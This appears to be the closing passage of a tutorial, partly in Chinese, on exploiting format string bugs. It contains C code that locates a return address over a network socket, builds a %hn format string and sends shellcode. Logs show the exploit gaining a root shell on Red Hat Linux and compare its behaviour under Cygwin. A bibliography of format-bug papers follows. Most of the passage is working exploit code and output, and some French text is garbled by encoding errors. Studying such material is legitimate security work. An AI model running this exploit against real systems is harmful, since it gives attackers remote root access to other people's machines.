                buf[i+4] == (char)0x04 && buf[i+5] == (char)0x08 &&
               ( *(int*) &buf[i+6] ==formatstring1 )
                ) {
                use_format = 1;
                addr_ret = read_at + i - 2 + 4 - 4;
                printf("addr_ret %p/n",addr_ret);
                if (  (addr_ret & 0xff)* ( (addr_ret >>  8) & 0xff) *( (addr_ret >> 16) & 0xff) * ((addr_ret >> 24) & 0xff) ==0 )
                    addr_ret = -1;
                else fprintf (stderr, "[ret addr is: 0x%x (%d) ]/n", addr_ret, len);
                  }//end if
        }//end else  like_printf
      }//end while
    }//end if

if  (addr_ret != -1 )
    if (use_format ==1)
        addr_shellcode =  formatstring1+8+aligned+20+8;
    if (use_format ==2)
        addr_shellcode =  formatstring2+8+aligned+20+8;

    read_at += (len-4+1);
    if (len == sizeof(buf)) {
      fprintf(stderr, "Warning: this has not been tested !!!/n");
      fprintf(stderr, "len = %d/nread_at = 0x%x", len, read_at);
    get_addr_as_char(read_at, fmt);
    write(sd, fmt, strlen(fmt));
  } //end while

  fprintf (stderr, "/naddr-ret %p addr_shellcode %p/n",addr_ret,addr_shellcode);
  /* send the format string */
  fprintf (stderr, "/nBuilding format string and send shellcode /nwaiting for get a shell if succeed.../n/n");
  memset(buf, 0, sizeof(buf));
  build_hn(buf, addr_ret, addr_shellcode, offset, 0,aligned);
  write(sd, buf, strlen(buf));


  return 0;

实验一: 本地redhat的
[alert7@redhat72 format]$ gcc -o e e.c
[alert7@redhat72 format]$ ./e
Using IP
Connected to

[Found offset = 6 aligned 0 ]

[buffer addr is: 0xbffff070 (12) ]
buf = (12)
70 f0 ff bf 70 f0 ff bf 25 36 24 73

[buffer addr is: 0xbffff470 (8) ]
buf = (8)
70 f4 ff bf 70 f4 ff bf

addr_ret 0xbffff04c
[ret addr is: 0xbffff04c (34) ]

addr-ret 0xbffff04c addr_shellcode 0xbffff094

Building format string and send shellcode
waiting for get a shell if succeed...

low 61588;TWO 8;start 65536;base 0;offset 6;high 49151

4c f0 ff bf 4e f0 ff bf 25 2e 31 32 37 31 31 36 78 25 36 24 6e
25 2e 35 33 30 39 39 78 25 37 24 68 6e

Linux redhat72 2.4.7-10 #1 Thu Sep 6 17:27:27 EDT 2001 i686 unknown
uid=0(root) gid=100(users)

实验二: 远程cygwin下编译的

$ ./e -i
Using IP
Connected to

[Found offset = 6 aligned 0 ]

[buffer addr is: 0xbffff070 (12) ]
buf = (12)
70 f0 ff bf 70 f0 ff bf 25 36 24 73

[buffer addr is: 0xbffff470 (8) ]
buf = (8)
70 f4 ff bf 70 f4 ff bf

addr_ret 0xbffff04c
[ret addr is: 0xbffff04c (34) ]

addr-ret 0xbffff04c addr_shellcode 0xbffff094

Building format string and send shellcode
waiting for get a shell if succeed...

low 61588;TWO 8;start 65536;base 0;offset 6;high 49151

4c f0 ff bf 4e f0 ff bf 25 2e 2d 33 39 35 36 78 25 36 24 6e 25
2e 2d 31 32 34 33 37 78 25 37 24 68 6e

sztcww@SZTCWW1 ~

Building format string的时候,也就是在函数build_hn()中
i = snprintf(buf + sz+alinged, MAX_FMT_LENGTH,
           low - TWO + start - base,
           high - low + start,
           offset + 1);

在一般的linux redhat中产生的format string为
25 2e 31 32 37 31 31 36 78 25 36 24 6e
25 2e 35 33 30 39 39 78 25 37 24 68 6e

在cygwin下产生的format string为
25 2e 2d 33 39 35 36 78 25 36 24 6e 25
2e 2d 31 32 34 33 37 78 25 37 24 68 6e

现在唯一的解释就是cygwin下实现的*printf和linux redhat实现的不一样。

所以建议在写format string exploit的时候,不要拿cygwin做实验环境,


--[  Bibliography  ]--

   1. More info on format bugs par P. "kalou" Bouchareine

   2. Format Bugs: What are they, Where did they come from,... How to
      exploit them par lamagra
      (lamagra@digibel.org <lamagra@digibel.org>)

   3. 蓈iter les failles de s閏urit?d鑣 le d関eloppement d'une
      application - 4 : les cha頽es de format  par F. Raynal, C.
      Grenier, C. Blaess
      (http://minimum.inria.fr/~raynal/index.php3?page=121 ou

   4. Exploiting the format string vulnerabilities par scut (team TESO)

   5. fmtbuilder-howto par F. Raynal et S. Dralet

Fr閐閞ic Raynal - <pappy@miscmag.com>

---the end---